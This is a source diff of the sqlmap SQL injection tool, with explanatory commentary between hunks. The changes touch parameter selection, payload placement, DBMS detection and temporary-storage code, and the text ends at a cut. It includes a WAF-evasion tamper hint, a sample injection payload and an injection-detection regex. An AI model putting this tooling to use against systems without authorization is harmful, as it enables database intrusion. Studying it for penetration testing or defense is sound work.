                paramDict = conf.paramDict[place]

+                paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
                for parameter, value in paramDict.items():
                    if not proceed:
                        break

@@ -436,7 +451,7 @@ def start():
                    if paramKey in kb.testedParams:
                        testSqlInj = False

-                        infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
+                        infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
                        logger.info(infoMsg)

                    elif parameter in conf.testParameter:

@@ -445,45 +460,61 @@ def start():
                    elif parameter == conf.rParam:
                        testSqlInj = False

-                        infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
+                        infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
                        logger.info(infoMsg)

                    elif parameter in conf.skip:
                        testSqlInj = False

-                        infoMsg = "skipping %s parameter '%s'" % (place, parameter)
+                        infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
+                        logger.info(infoMsg)
+
+                    elif parameter == conf.csrfToken:
+                        testSqlInj = False
+
+                        infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
                        logger.info(infoMsg)

                    # Ignore session-like parameters for --level < 4
                    elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
                        testSqlInj = False

-                        infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
+                        infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
                        logger.info(infoMsg)

-                    elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
+                    elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
                        check = checkDynParam(place, parameter, value)

                        if not check:
-                            warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
+                            warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
                            logger.warn(warnMsg)
+
+                            if conf.skipStatic:
+                                infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
+                                logger.info(infoMsg)
+
+                                testSqlInj = False
                        else:
-                            infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
+                            infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
                            logger.info(infoMsg)

                        kb.testedParams.add(paramKey)

                    if testSqlInj:
+                        try:
+                            if place == PLACE.COOKIE:
+                                pushValue(kb.mergeCookies)
+                                kb.mergeCookies = False
+
                            check = heuristicCheckSqlInjection(place, parameter)

                            if check != HEURISTIC_TEST.POSITIVE:
                                if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
-                                    infoMsg = "skipping %s parameter '%s'" % (place, parameter)
+                                    infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
                                    logger.info(infoMsg)
                                    continue

-                            infoMsg = "testing for SQL injection on %s " % place
+                            infoMsg = "testing for SQL injection on %s " % paramType
                            infoMsg += "parameter '%s'" % parameter
                            logger.info(infoMsg)
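The parameter loop gains several new short-circuits: anti-CSRF token parameters are never tested, session-like parameters still require a higher level, and with --skip-static a parameter that does not appear dynamic is dropped as well. A condensed sketch of that decision order (flag names and the ignored list are made up for the sketch):

    def should_test(parameter, is_dynamic, csrf_token=None, skip_static=False, level=1,
                    ignored=("PHPSESSID", "JSESSIONID")):
        if csrf_token and parameter == csrf_token:
            return False                      # anti-CSRF tokens are skipped outright
        if level < 4 and parameter.upper() in ignored:
            return False                      # session-like parameters need a higher --level
        if skip_static and not is_dynamic:
            return False                      # --skip-static drops non-dynamic parameters
        return True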
@@ -506,10 +537,14 @@ def start():
                            paramKey = (conf.hostname, conf.path, None, None)
                            kb.testedParams.add(paramKey)
                        else:
-                            warnMsg = "%s parameter '%s' is not " % (place, parameter)
+                            warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
                            warnMsg += "injectable"
                            logger.warn(warnMsg)

+                        finally:
+                            if place == PLACE.COOKIE:
+                                kb.mergeCookies = popValue()
+
            if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
                if kb.vainRun and not conf.multipleTargets:
                    errMsg = "no parameter(s) found for testing in the provided data "

@@ -562,6 +597,11 @@ def start():
                    errMsg += "expression that you have chosen "
                    errMsg += "does not match exclusively True responses"

+                if not conf.tamper:
+                    errMsg += " If you suspect that there is some kind of protection mechanism "
+                    errMsg += "involved (e.g. WAF) maybe you could retry "
+                    errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
+
                raise SqlmapNotVulnerableException(errMsg)
            else:
                # Flush the flag
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -71,9 +71,9 @@ def setHandler():
            items.remove(_)
            items.insert(0, _)

-    for name, aliases, Handler, Connector in items:
-        if conf.dbms and conf.dbms not in aliases:
-            debugMsg = "skipping test for %s" % name
+    for dbms, aliases, Handler, Connector in items:
+        if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
+            debugMsg = "skipping test for %s" % dbms
            logger.debug(debugMsg)
            continue

@@ -84,7 +84,7 @@ def setHandler():
            logger.debug("forcing timeout to 10 seconds")
            conf.timeout = 10

-        dialect = DBMS_DICT[name][3]
+        dialect = DBMS_DICT[dbms][3]

        if dialect:
            sqlalchemy = SQLAlchemy(dialect=dialect)

@@ -93,7 +93,10 @@ def setHandler():
            if sqlalchemy.connector:
                conf.dbmsConnector = sqlalchemy
            else:
+                try:
                    conf.dbmsConnector.connect()
+                except NameError:
+                    pass
        else:
            conf.dbmsConnector.connect()
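setHandler() now keys each handler entry by a canonical DBMS name and only skips it when the user-supplied --dbms value matches neither that name nor one of its aliases, case-insensitively. A small sketch of that matching rule (the alias tuples are illustrative):

    def matches_requested_dbms(requested, dbms, aliases):
        # No --dbms given: every handler stays in the candidate list.
        if not requested:
            return True
        requested = requested.lower()
        return requested == dbms or requested in aliases

    # matches_requested_dbms("MySQL", "mysql", ("mysql", "mariadb")) -> True
    # matches_requested_dbms("Oracle", "mysql", ("mysql", "mariadb")) -> False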
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
@@ -10,6 +10,7 @@ import re
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isDBMSVersionAtLeast
 from lib.core.common import isNumber
 from lib.core.common import isTechniqueAvailable

@@ -19,6 +20,7 @@ from lib.core.common import safeSQLIdentificatorNaming
 from lib.core.common import singleTimeWarnMessage
 from lib.core.common import splitFields
 from lib.core.common import unArrayizeValue
+from lib.core.common import urlencode
 from lib.core.common import zeroDepthSearch
 from lib.core.data import conf
 from lib.core.data import kb

@@ -26,11 +28,15 @@ from lib.core.data import queries
 from lib.core.dicts import DUMP_DATA_PREPROCESS
 from lib.core.dicts import FROM_DUMMY_TABLE
 from lib.core.enums import DBMS
+from lib.core.enums import HTTP_HEADER
 from lib.core.enums import PAYLOAD
 from lib.core.enums import PLACE
 from lib.core.enums import POST_HINT
 from lib.core.exception import SqlmapNoneDataException
+from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
+from lib.core.settings import DEFAULT_COOKIE_DELIMITER
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import GENERIC_SQL_COMMENT
 from lib.core.settings import PAYLOAD_DELIMITER
 from lib.core.settings import REPLACEMENT_MARKER
@@ -73,7 +79,9 @@ class Agent(object):

        retVal = ""

-        if where is None and isTechniqueAvailable(kb.technique):
+        if kb.forceWhere:
+            where = kb.forceWhere
+        elif where is None and isTechniqueAvailable(kb.technique):
            where = kb.injection.data[kb.technique].where

        if kb.injection.place is not None:

@@ -84,7 +92,7 @@ class Agent(object):

            paramString = conf.parameters[place]
            paramDict = conf.paramDict[place]
-            origValue = paramDict[parameter]
+            origValue = getUnicode(paramDict[parameter])

            if place == PLACE.URI:
                paramString = origValue

@@ -98,10 +106,8 @@ class Agent(object):
                origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
                if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                    origValue = origValue.split('>')[-1]
-                elif kb.postHint == POST_HINT.JSON:
-                    origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
-                elif kb.postHint == POST_HINT.JSON_LIKE:
-                    origValue = extractRegexResult(r'(?s)\'\s*:\s*(?P<result>\d+\Z)', origValue) or extractRegexResult(r"(?s)(?P<result>[^']+\Z)", origValue)
+                elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
+                    origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
                else:
                    _ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
                    origValue = _.split('=', 1)[1] if '=' in _ else ""

@@ -109,6 +115,14 @@ class Agent(object):
                paramString = origValue
                origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
                origValue = origValue[origValue.index(',') + 1:]
+                match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
+                if match:
+                    origValue = match.group("value")
+            elif ',' in paramString:
+                header = paramString.split(',')[0]
+
+                if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
+                    origValue = origValue.split(' ')[-1].split(':')[-1]

            if conf.prefix:
                value = origValue

@@ -152,7 +166,36 @@ class Agent(object):
        elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
            retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
        else:
-            retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+            def _(pattern, repl, string):
+                retVal = string
+                match = None
+                for match in re.finditer(pattern, string):
+                    pass
+
+                if match:
+                    while True:
+                        _ = re.search(r"\\g<([^>]+)>", repl)
+                        if _:
+                            try:
+                                repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
+                            except IndexError:
+                                break
+                        else:
+                            break
+                    retVal = string[:match.start()] + repl + string[match.end():]
+                return retVal
+
+            if origValue:
+                regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
+                retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+            else:
+                retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+
+            if retVal == paramString and urlencode(parameter) != parameter:
+                retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
+
+            if retVal:
+                retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')

        return retVal
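The inline re.sub() is replaced above by a local helper that walks all matches with re.finditer(), keeps only the last one, expands any \g<...> group references in the replacement by hand, and splices the replacement into the original string. The point is that only the final occurrence of parameter=value gets rewritten and backslashes in the payload are not re-interpreted by the regex engine. A simplified standalone version of the "replace only the last match" idea (plain-text replacement, no group expansion):

    import re

    def sub_last(pattern, repl, string):
        """Replace only the last match of pattern in string."""
        last = None
        for last in re.finditer(pattern, string):
            pass                      # keep iterating; 'last' ends up as the final match
        if last is None:
            return string
        return string[:last.start()] + repl + string[last.end():]

    # sub_last(r"id=\d+", "id=1 AND 2>1", "a=1&id=2&id=3") -> 'a=1&id=2&id=1 AND 2>1'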
@@ -176,6 +219,9 @@ class Agent(object):
        if conf.direct:
            return self.payloadDirect(expression)

+        if expression is None:
+            return None
+
        expression = self.cleanupPayload(expression)
        expression = unescaper.escape(expression)
        query = None

@@ -204,7 +250,7 @@ class Agent(object):
            if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
                query += " "

-        query = "%s%s" % (query, expression)
+        query = "%s%s" % ((query or "").replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)

        return query

@@ -217,6 +263,9 @@ class Agent(object):
        if conf.direct:
            return self.payloadDirect(expression)

+        if expression is None:
+            return None
+
        expression = self.cleanupPayload(expression)

        # Take default values if None

@@ -238,7 +287,7 @@ class Agent(object):
            pass

        elif suffix and not comment:
-            expression += suffix
+            expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER)

        return re.sub(r"(?s);\W*;", ";", expression)

@@ -984,7 +1033,7 @@ class Agent(object):
        """

        _ = re.escape(PAYLOAD_DELIMITER)
-        return re.sub("(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
+        return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value

    def runAsDBMSUser(self, query):
        if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -10,10 +10,27 @@ try:
 except:
     import pickle

+import itertools
 import os
+import sys
 import tempfile

-from lib.core.settings import BIGARRAY_CHUNK_LENGTH
+from lib.core.exception import SqlmapSystemException
+from lib.core.settings import BIGARRAY_CHUNK_SIZE
+
+DEFAULT_SIZE_OF = sys.getsizeof(object())
+
+def _size_of(object_):
+    """
+    Returns total size of a given object_ (in bytes)
+    """
+
+    retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)
+    if isinstance(object_, dict):
+        retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
+    elif hasattr(object_, "__iter__"):
+        retval += sum(_size_of(_) for _ in object_)
+    return retval

 class Cache(object):
     """
@@ -32,15 +49,21 @@ class BigArray(list):

     def __init__(self):
         self.chunks = [[]]
+        self.chunk_length = sys.maxint
         self.cache = None
-        self.length = 0
         self.filenames = set()
+        self._os_remove = os.remove
+        self._size_counter = 0

     def append(self, value):
         self.chunks[-1].append(value)
-        if len(self.chunks[-1]) >= BIGARRAY_CHUNK_LENGTH:
+        if self.chunk_length == sys.maxint:
+            self._size_counter += _size_of(value)
+            if self._size_counter >= BIGARRAY_CHUNK_SIZE:
+                self.chunk_length = len(self.chunks[-1])
+                self._size_counter = None
+        if len(self.chunks[-1]) >= self.chunk_length:
             filename = self._dump(self.chunks[-1])
-            del(self.chunks[-1][:])
             self.chunks[-1] = filename
             self.chunks.append([])
@@ -51,8 +74,13 @@ class BigArray(list):
     def pop(self):
         if len(self.chunks[-1]) < 1:
             self.chunks.pop()
+            try:
                 with open(self.chunks[-1], "rb") as fp:
                     self.chunks[-1] = pickle.load(fp)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex
+                raise SqlmapSystemException, errMsg
         return self.chunks[-1].pop()

     def index(self, value):
@@ -61,21 +89,41 @@ class BigArray(list):
                 return index
         return ValueError, "%s is not in list" % value

-    def _dump(self, value):
-        handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
+    def _dump(self, chunk):
+        try:
+            handle, filename = tempfile.mkstemp()
             self.filenames.add(filename)
             os.close(handle)
             with open(filename, "w+b") as fp:
-                pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
+                pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
             return filename
+        except (OSError, IOError), ex:
+            errMsg = "exception occurred while storing data "
+            errMsg += "to a temporary file ('%s'). Please " % ex
+            errMsg += "make sure that there is enough disk space left. If problem persists, "
+            errMsg += "try to set environment variable 'TEMP' to a location "
+            errMsg += "writeable by the current user"
+            raise SqlmapSystemException, errMsg

     def _checkcache(self, index):
         if (self.cache and self.cache.index != index and self.cache.dirty):
             filename = self._dump(self.cache.data)
             self.chunks[self.cache.index] = filename
         if not (self.cache and self.cache.index == index):
+            try:
                 with open(self.chunks[index], "rb") as fp:
                     self.cache = Cache(index, pickle.load(fp), False)
+            except IOError, ex:
+                errMsg = "exception occurred while retrieving data "
+                errMsg += "from a temporary file ('%s')" % ex
+                raise SqlmapSystemException, errMsg
+
+    def __getstate__(self):
+        return self.chunks, self.filenames
+
+    def __setstate__(self, state):
+        self.__init__()
+        self.chunks, self.filenames = state

     def __getslice__(self, i, j):
         retval = BigArray()
@@ -88,8 +136,8 @@ class BigArray(list):
     def __getitem__(self, y):
         if y < 0:
             y += len(self)
-        index = y / BIGARRAY_CHUNK_LENGTH
-        offset = y % BIGARRAY_CHUNK_LENGTH
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
         chunk = self.chunks[index]
         if isinstance(chunk, list):
             return chunk[offset]

@@ -98,8 +146,8 @@ class BigArray(list):
             return self.cache.data[offset]

     def __setitem__(self, y, value):
-        index = y / BIGARRAY_CHUNK_LENGTH
-        offset = y % BIGARRAY_CHUNK_LENGTH
+        index = y / self.chunk_length
+        offset = y % self.chunk_length
         chunk = self.chunks[index]
         if isinstance(chunk, list):
             chunk[offset] = value

@@ -116,11 +164,4 @@ class BigArray(list):
             yield self[i]

     def __len__(self):
-        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])
-
-    def __del__(self):
-        for filename in self.filenames:
-            try:
-                os.remove(filename)
-            except:
-                pass
+        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])
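BigArray now sizes its on-disk chunks by memory footprint instead of a fixed element count: it keeps appending to the in-memory chunk while summing the approximate size of each item, and the first time the running total crosses the byte budget it freezes the current length as the per-chunk element count used from then on. A compact sketch of that calibration step (the constant and class are illustrative, not the real BigArray):

    import sys

    CHUNK_SIZE_BYTES = 4 * 1024 * 1024  # assumed budget per in-memory chunk

    class SizeCalibratedChunks(object):
        def __init__(self):
            self.chunk = []
            self.chunk_length = sys.maxsize   # "not calibrated yet" sentinel
            self._bytes = 0

        def append(self, value):
            self.chunk.append(value)
            if self.chunk_length == sys.maxsize:
                self._bytes += sys.getsizeof(value)
                if self._bytes >= CHUNK_SIZE_BYTES:
                    # From now on every chunk holds this many elements.
                    self.chunk_length = len(self.chunk)
            if len(self.chunk) >= self.chunk_length:
                self.flush()

        def flush(self):
            # Placeholder: the real class pickles the chunk to a temporary file
            # and starts a fresh in-memory list.
            self.chunk = []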
@@ -1,7 +1,7 @@
 #!/usr/bin/env python

 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

@@ -9,8 +9,12 @@ import codecs
 import contextlib
 import cookielib
 import copy
+import getpass
+import hashlib
 import httplib
 import inspect
+import json
+import locale
 import logging
 import ntpath
 import os

@@ -23,6 +27,7 @@ import sys
 import tempfile
 import time
 import urllib
+import urllib2
 import urlparse
 import unicodedata
@@ -36,7 +41,9 @@ from subprocess import PIPE
 from subprocess import Popen as execute
 from xml.dom import minidom
 from xml.sax import parse
+from xml.sax import SAXParseException

+from extra.beep.beep import beep
 from extra.cloak.cloak import decloak
 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.bigarray import BigArray

@@ -71,12 +78,13 @@ from lib.core.enums import PAYLOAD
 from lib.core.enums import REFLECTIVE_COUNTER
 from lib.core.enums import SORT_ORDER
 from lib.core.exception import SqlmapDataException
-from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapNoneDataException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.exception import SqlmapMissingDependence
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict

@@ -90,14 +98,14 @@ from lib.core.settings import DBMS_DIRECTORY_DICT
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import DEFAULT_MSSQL_SCHEMA
-from lib.core.settings import DESCRIPTION
-from lib.core.settings import DUMMY_SQL_INJECTION_CHARS
 from lib.core.settings import DUMMY_USER_INJECTION
 from lib.core.settings import DYNAMICITY_MARK_LENGTH
 from lib.core.settings import ERROR_PARSING_REGEXES
 from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
 from lib.core.settings import FORM_SEARCH_REGEX
 from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
+from lib.core.settings import GIT_PAGE
+from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
 from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
 from lib.core.settings import HASHDB_MILESTONE_VALUE
 from lib.core.settings import HOST_ALIASES

@@ -110,7 +118,6 @@ from lib.core.settings import LARGE_OUTPUT_THRESHOLD
 from lib.core.settings import MIN_ENCODED_LEN_CHECK
 from lib.core.settings import MIN_TIME_RESPONSES
 from lib.core.settings import MIN_VALID_DELAYED_RESPONSE
-from lib.core.settings import ML
 from lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES
 from lib.core.settings import NULL
 from lib.core.settings import PARAMETER_AMP_MARKER

@@ -127,9 +134,7 @@ from lib.core.settings import REFLECTED_MAX_REGEX_PARTS
 from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
 from lib.core.settings import REFLECTED_VALUE_MARKER
 from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
-from lib.core.settings import REVISION
 from lib.core.settings import SENSITIVE_DATA_REGEX
-from lib.core.settings import SITE
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import TEXT_TAG_REGEX
 from lib.core.settings import TIME_STDEV_COEFF

@@ -139,7 +144,6 @@ from lib.core.settings import URI_QUESTION_MARKER
 from lib.core.settings import URLENCODE_CHAR_LIMIT
 from lib.core.settings import URLENCODE_FAILSAFE_CHARS
 from lib.core.settings import USER_AGENT_ALIASES
-from lib.core.settings import VERSION
 from lib.core.settings import VERSION_STRING
 from lib.core.threads import getCurrentThreadData
 from lib.utils.sqlalchemy import _sqlalchemy
@ -431,10 +435,9 @@ class Backend:
|
||||||
|
|
||||||
This functions is called to:
|
This functions is called to:
|
||||||
|
|
||||||
1. Sort the tests, getSortedInjectionTests() - detection phase.
|
1. Ask user whether or not skip specific DBMS tests in detection phase,
|
||||||
2. Ask user whether or not skip specific DBMS tests in detection phase,
|
|
||||||
lib/controller/checks.py - detection phase.
|
lib/controller/checks.py - detection phase.
|
||||||
3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
|
2. Sort the fingerprint of the DBMS, lib/controller/handler.py -
|
||||||
fingerprint phase.
|
fingerprint phase.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@@ -442,6 +445,13 @@ class Backend:

     @staticmethod
     def getIdentifiedDbms():
+        """
+        This functions is called to:
+
+        1. Sort the tests, getSortedInjectionTests() - detection phase.
+        2. Etc.
+        """
+
         dbms = None

         if not kb:
@@ -449,13 +459,13 @@ class Backend:
         elif Backend.getForcedDbms() is not None:
             dbms = Backend.getForcedDbms()
         elif Backend.getDbms() is not None:
-            dbms = kb.dbms
-        elif conf.get("dbms"):
-            dbms = conf.dbms
-        elif Backend.getErrorParsedDBMSes():
-            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
+            dbms = Backend.getDbms()
         elif kb.get("injection") and kb.injection.dbms:
             dbms = unArrayizeValue(kb.injection.dbms)
+        elif Backend.getErrorParsedDBMSes():
+            dbms = unArrayizeValue(Backend.getErrorParsedDBMSes())
+        elif conf.get("dbms"):
+            dbms = conf.get("dbms")

         return aliasToDbmsEnum(dbms)

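The reordered elif chain above changes the precedence used when resolving the back-end DBMS: a forced value wins, then a fingerprinted one, then the DBMS recorded for the detected injection, then error-message parsing, and only last the user-supplied option. A minimal standalone sketch of the same precedence idea (the resolve_dbms() helper and its argument names are illustrative, not part of sqlmap):

    # Hypothetical, simplified illustration of the precedence introduced above
    def resolve_dbms(forced=None, fingerprinted=None, injection=None,
                     error_parsed=None, user_supplied=None):
        # the first non-empty source, in the new order of preference, wins
        for candidate in (forced, fingerprinted, injection, error_parsed, user_supplied):
            if candidate:
                return candidate
        return None

    # an error-message guess no longer overrides what the injection phase identified
    print(resolve_dbms(injection="MySQL", error_parsed="PostgreSQL", user_supplied="Oracle"))  # MySQL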
@@ -537,7 +547,6 @@ def paramToDict(place, parameters=None):
     if place in conf.parameters and not parameters:
         parameters = conf.parameters[place]

-    parameters = parameters.replace(", ", ",")
     parameters = re.sub(r"&(\w{1,4});", r"%s\g<1>%s" % (PARAMETER_AMP_MARKER, PARAMETER_SEMICOLON_MARKER), parameters)
     if place == PLACE.COOKIE:
         splitParams = parameters.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)
@@ -549,20 +558,23 @@ def paramToDict(place, parameters=None):
        parts = element.split("=")

        if len(parts) >= 2:
-            parameter = parts[0].replace(" ", "")
+            parameter = urldecode(parts[0].replace(" ", ""))

+            if not parameter:
+                continue
+
            if conf.paramDel and conf.paramDel == '\n':
                parts[-1] = parts[-1].rstrip()

            condition = not conf.testParameter
-            condition |= parameter in conf.testParameter
+            condition |= conf.testParameter is not None and parameter in conf.testParameter
            condition |= place == PLACE.COOKIE and len(intersect((PLACE.COOKIE,), conf.testParameter, True)) > 0

            if condition:
                testableParameters[parameter] = "=".join(parts[1:])
-                if not conf.multipleTargets:
+                if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
                    _ = urldecode(testableParameters[parameter], convall=True)
-                    if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
+                    if (_.endswith("'") and _.count("'") == 1
                        or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
                        and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
                        warnMsg = "it appears that you have provided tainted parameter values "
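For context, the new condition flags obviously tainted test values (a value ending with a single quote, a run of three or more 9s, or a DUMMY_USER_INJECTION match), while the CSRF token parameter is now excluded from testing altogether. A rough standalone approximation of that check, where the regex constant is a simplified stand-in for the one imported from lib.core.settings:

    import re

    # simplified stand-in for DUMMY_USER_INJECTION from lib.core.settings
    DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+\S+[=><]|\bUNION\b.+\bSELECT\b"

    def looks_tainted(value):
        # mirrors the heuristic in the hunk above
        return (value.endswith("'") and value.count("'") == 1) \
            or re.search(r"\A9{3,}", value) is not None \
            or re.search(DUMMY_USER_INJECTION, value) is not None

    print(looks_tainted("1'"))        # True - leftover manual injection attempt
    print(looks_tainted("999999"))    # True - classic dummy numeric value
    print(looks_tainted("john.doe"))  # False - ordinary parameter value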
@@ -572,10 +584,15 @@ def paramToDict(place, parameters=None):
                        warnMsg += "so sqlmap could be able to run properly"
                        logger.warn(warnMsg)

-                        message = "are you sure you want to continue? [y/N] "
+                        message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] "
                        test = readInput(message, default="N")
                        if test[0] not in ("y", "Y"):
                            raise SqlmapSilentQuitException
+                    elif not _:
+                        warnMsg = "provided value for parameter '%s' is empty. " % parameter
+                        warnMsg += "Please, always use only valid parameter values "
+                        warnMsg += "so sqlmap could be able to run properly"
+                        logger.warn(warnMsg)

     if conf.testParameter and not testableParameters:
         paramStr = ", ".join(test for test in conf.testParameter)
@@ -834,11 +851,19 @@ def dataToTrafficFile(data):
     except IOError, ex:
         errMsg = "something went wrong while trying "
         errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
-        raise SqlmapGenericException(errMsg)
+        raise SqlmapSystemException(errMsg)

 def dataToDumpFile(dumpFile, data):
-    dumpFile.write(data)
-    dumpFile.flush()
+    try:
+        dumpFile.write(data)
+        dumpFile.flush()
+    except IOError, ex:
+        if "No space left" in getUnicode(ex):
+            errMsg = "no space left on output device"
+            logger.error(errMsg)
+        else:
+            raise
+

 def dataToOutFile(filename, data):
     retVal = None
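The new wrapper above downgrades a full output device from a crash to a logged error while re-raising every other IOError. A self-contained sketch of the same pattern, standard library only (the logger setup and function name are illustrative):

    import errno
    import logging

    logging.basicConfig(level=logging.INFO)
    logger = logging.getLogger("dumpSketch")

    def write_chunk(fileobj, data):
        try:
            fileobj.write(data)
            fileobj.flush()
        except IOError as ex:
            if ex.errno == errno.ENOSPC or "No space left" in str(ex):
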